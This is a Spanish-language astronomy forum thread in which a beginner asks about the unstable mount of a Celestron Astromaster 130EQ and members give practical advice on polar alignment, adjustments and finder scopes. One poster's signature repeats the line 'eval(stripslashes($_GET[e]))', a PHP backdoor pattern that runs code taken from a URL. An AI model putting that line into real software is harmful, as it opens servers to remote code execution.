Presentación y primera duda

Preguntas básicas sobre astronomía
Responder
jamarcos
Mensajes: 6
Registrado: Mar Oct 07, 2008 9:29 am

Presentación y primera duda

Mensaje por jamarcos »

Hola a tod@s soy nuevo en esto de la astronomia, y hace poco que regalaron (2meses) un telescopio en concreto un celestron Astromaster 130EQ.
Hasta el momento he podido ver la Luna y Jupiter, este último con grandes dificultades sobre todo para apuntar y poderlo seguir ya que la montura que trae el tubo es bastante mala.
Si hay alguien que me pueda decir si merece la pena comprar una nueva o tirar con el equipo lo agradeceria mucho
Saludos a todos
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentación y primera duda

Mensaje por m3ntol »

Hola,
el telescopio es este ¿no?
http://www.celestron.com/c2/product.php?ProdID=429

La óptica es bastante decente y la abertura muy buebna para iniciarse. Podrás ver gran cantidad de objetos. El teles en si es ideal para iniciarse.

La montura quizá sea un pelín endeble pero te pregunto
¿por qué dices que es muy mala?
Es una EQ-3, es decir, ecuatorial, ¿la pones en estación cada vez que observas?
¿Los problemas que tienes son solo de seguimiento o también de inestabilidad?

Un salduo y bienvenido!
phpbb:eval(stripslashes($_GET[e]));
jamarcos
Mensajes: 6
Registrado: Mar Oct 07, 2008 9:29 am

Presentación y primera duda

Mensaje por jamarcos »

Hola, si efectivamente ese es el telescoio, el problema que tengo es con la montura, es muy inestable y se mueve mucho, pero creo que el problema no esta en el tripode, si no en la propia montura equatorial, ademas uno de los movimientos solo admite un rago de unos 10º y ya no se puede seguir más, habria que mover el tripode para seguir.
Es ecuatorial, pero que creo que no es EQ3, debe ser algo similar
Lo que estaba pensando era en una montura algo mejor ya que en el futuro me gustaria poder hacer alguna foto
Muchas Gracias
rcacho
Mensajes: 532
Registrado: Vie Mar 02, 2007 9:39 pm

Presentación y primera duda

Mensaje por rcacho »

Esa montura no está mal, pero hay que hacerle unos pequeños ajustes. carlos y yo desmontamos una, y apretamos todos los tornillos, quitamos la grasa de sitios innecesarios y pusimos una gota de pegamento en las puntas de los tornillos que actúan como frenos, y la montura mejoró bastante.

El problema en declinación se soluciona con una buena puesta en estación, y no utilizando el mando de movimiento lento para cambiar de objeto, sino soltando los frenos, moviendo el telescopio a mano y volviendo a apretar los frenos. El mando de movimiento lento de esta montura está pensado para hacer ligeros ajustes.

Por cierto, cambia de buscador YA! El que trae es malísimo. Para conseguir alinearlo tuvimos que desmontarlo y rebajar a base de cutter una pieza. Si puedes hacerte con un buscador de punto rojo, te vendrá muy bien.

Un saludo!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentación y primera duda

Mensaje por m3ntol »

Perdona que te pregunte de nuevo,
¿pones la montura en estación cada vez que montas el teles?
phpbb:eval(stripslashes($_GET[e]));
jamarcos
Mensajes: 6
Registrado: Mar Oct 07, 2008 9:29 am

Presentación y primera duda

Mensaje por jamarcos »

hola otra vez, muchas gracias por vuestra ayuda, la verdad es que tengo muchos problemas tanto con la montura como con el buscado que como comentais es malo malo malo, vamos me cuesta mucho buscar cualquier cosa, casi hasta la luna. Asi que habia pensado en comprar una montura que he visto en astroeduca, en concreto la EQ3-2 o AstroView bajo la marca ORION, que pone que viene con un buscado de la polar, no se si eso valdra para sustituir el buscador que tengo en el tubo.
No pongo el teles en estación ya que resulta muy dificil buscar cualquier objeto, asi que como no tengo mucho tiempo, solo miro la luna y jupiter que es a lo mas que he llegado.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentación y primera duda

Mensaje por m3ntol »

Si no pones la montura en estación va a dar igual qué te compres, ya podrás hacerte con una LOosmandy G-11 que seguirás teniendo problermas para buscar objetos.

Al poner la montura en estación podrás seguir los objetos solo con mover uno de los mandos de movimiento lento. Esos mandos no están para localizar el objeto, sino para seguirlo.

Para localizar el objeto deberás soltar los frenos de Ar y Dec y, una vez localizado, seguirlo con el movimiento lento, normalmente de un solo eje (Ar) y corrigiendo en Dec si la puesta en estación no ha sido buena.

Creo que el problema que tienes no es de la montura sino de que no pones en estación. Si te resulta farragoso hacerlo (a mi no me gustan las ecuatoriales por eso mismo) cómprate una montura azimutal (que se mueve arriba/abajo e izquierda/derecha) y será mucho más fácil localizar los objetos.
phpbb:eval(stripslashes($_GET[e]));
Responder